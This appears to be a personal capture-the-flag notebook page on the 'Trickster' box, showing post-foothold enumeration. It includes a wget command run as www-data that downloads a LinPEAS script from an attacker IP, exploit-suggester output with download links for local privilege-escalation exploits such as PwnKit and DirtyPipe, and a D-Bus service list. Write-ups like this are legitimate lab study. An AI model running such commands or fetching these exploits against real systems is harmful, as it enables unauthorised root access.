InfoSec LAB

Trickster_Automated

Created: 2 min read

PEAS

Conducting an automated enumeration after performing a manual enumeration

www-data@trickster:/var/tmp$ wget -q http://10.10.15.34/linpeas_CVE_check.sh ; chmod 755 ./linpeas_CVE_check.sh

Delivery complete

Executing PEAS

CVEs

╔══════════╣ Executing Linux Exploit Suggester
 https://github.com/mzet-/linux-exploit-suggester
cat: write error: Broken pipe
cat: write error: Broken pipe
[+] [CVE-2022-0847] DirtyPipe
 
   Details: https://dirtypipe.cm4all.com/
   Exposure: less probable
   Tags: ubuntu=(20.04|21.04),debian=11
   Download URL: https://haxx.in/files/dirtypipez.c
 
[+] [CVE-2021-4034] PwnKit
 
   Details: https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt
   Exposure: less probable
   Tags: ubuntu=10|11|12|13|14|15|16|17|18|19|20|21,debian=7|8|9|10|11,fedora,manjaro
   Download URL: https://codeload.github.com/berdav/CVE-2021-4034/zip/main
 
[+] [CVE-2021-3156] sudo Baron Samedit
 
   Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
   Exposure: less probable
   Tags: mint=19,ubuntu=18|20, debian=10
   Download URL: https://codeload.github.com/blasty/CVE-2021-3156/zip/main
 
[+] [CVE-2021-3156] sudo Baron Samedit 2
 
   Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
   Exposure: less probable
   Tags: centos=6|7|8,ubuntu=14|16|17|18|19|20, debian=9|10
   Download URL: https://codeload.github.com/worawit/CVE-2021-3156/zip/main
 
[+] [CVE-2021-22555] Netfilter heap out-of-bounds write
 
   Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
   Exposure: less probable
   Tags: ubuntu=20.04{kernel:5.8.0-*}
   Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
   ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
   Comments: ip_tables kernel module must be loaded
 
[+] [CVE-2017-5618] setuid screen v4.5.0 LPE
 
   Details: https://seclists.org/oss-sec/2017/q1/184
   Exposure: less probable
   Download URL: https://www.exploit-db.com/download/https://www.exploit-db.com/exploits/41154

Containers

Services

╔══════════╣ D-Bus Service Objects list
 https://book.hacktricks.xyz/linux-hardening/privilege-escalation#d-bus
NAME                            PID PROCESS         USER             CONNECTION    UNIT                        SESSION DESCRIPTION
:1.0                            696 systemd-resolve systemd-resolve  :1.0          systemd-resolved.service    -       -
:1.1                            697 systemd-timesyn systemd-timesync :1.1          systemd-timesyncd.service   -       -
:1.13                           881 networkd-dispat root             :1.13         networkd-dispatcher.service -       -
:1.16                           886 snapd           root             :1.16         snapd.service               -       -
:1.2                            579 systemd-network systemd-network  :1.2          systemd-networkd.service    -       -
:1.3                              1 systemd         root             :1.3          init.scope                  -       -
:1.4                            883 polkitd         root             :1.4          polkit.service              -       -
:1.5                            888 udisksd         root             :1.5          udisks2.service             -       -
:1.543                        27006 busctl          www-data         :1.543        php8.1-fpm.service          -       -
:1.6                            927 ModemManager    root             :1.6          ModemManager.service        -       -
:1.7                            887 systemd-logind  root             :1.7          systemd-logind.service      -       -
com.ubuntu.SoftwareProperties     - -               -                (activatable) -                           -       -
org.freedesktop.DBus              1 systemd         root             -             init.scope                  -       -
org.freedesktop.ModemManager1   927 ModemManager    root             :1.6          ModemManager.service        -       -
org.freedesktop.PackageKit        - -               -                (activatable) -                           -       -
org.freedesktop.PolicyKit1      883 polkitd         root             :1.4          polkit.service              -       -
org.freedesktop.UDisks2         888 udisksd         root             :1.5          udisks2.service             -       -
org.freedesktop.UPower            - -               -                (activatable) -                           -       -
org.freedesktop.bolt              - -               -                (activatable) -                           -       -
org.freedesktop.fwupd             - -               -                (activatable) -                           -       -
org.freedesktop.hostname1         - -               -                (activatable) -                           -       -
org.freedesktop.locale1           - -               -                (activatable) -                           -       -
org.freedesktop.login1          887 systemd-logind  root             :1.7          systemd-logind.service      -       -
org.freedesktop.network1        579 systemd-network systemd-network  :1.2          systemd-networkd.service    -       -
org.freedesktop.resolve1        696 systemd-resolve systemd-resolve  :1.0          systemd-resolved.service    -       -
org.freedesktop.systemd1          1 systemd         root             :1.3          init.scope                  -       -
org.freedesktop.thermald          - -               -                (activatable) -                           -       -
org.freedesktop.timedate1         - -               -                (activatable) -                           -       -
org.freedesktop.timesync1       697 systemd-timesyn systemd-timesync :1.1          systemd-timesyncd.service   -       -

Network

Installed Programs

Compilers

Virtual Hosts

SSH

/opt

PrusaSlicer

Interactive Graph View

Backlinks